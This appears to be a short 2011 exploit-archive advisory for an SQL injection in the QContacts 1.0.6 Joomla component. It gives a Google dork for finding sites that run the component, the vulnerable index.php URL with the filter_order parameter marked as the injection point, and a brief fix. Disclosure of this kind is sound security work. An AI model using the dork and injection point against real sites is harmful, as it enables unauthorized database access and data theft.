QContacts 1.0.6 (Joomla component) SQL injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : QContacts 1.0.6 (Joomla component) SQL injection
# Published : 2011-12-08
# Author :
# Previous Title : Pixie v1.04 blog post CSRF
# Next Title : Xoops 2.5.4 Blind SQL Injection

############################################################################
# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*
# Google Dork: inurl:"/components/com_qcontacts/"
# Date: Decembar/08/2011
# Author: Don (BalcanCrew & BalcanHack)
# Software Link: *
http://www.latenight-coding.com/joomla-addons/qcontacts.html*
# Version: 1.0.6
# Tested on: Apache
############################################################################

Vulnerability:
This vulnerability affects /index.php

*
/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
*


How to fix this vulnerability:
*Filter metacharacters from user input.*

*~Don 2011*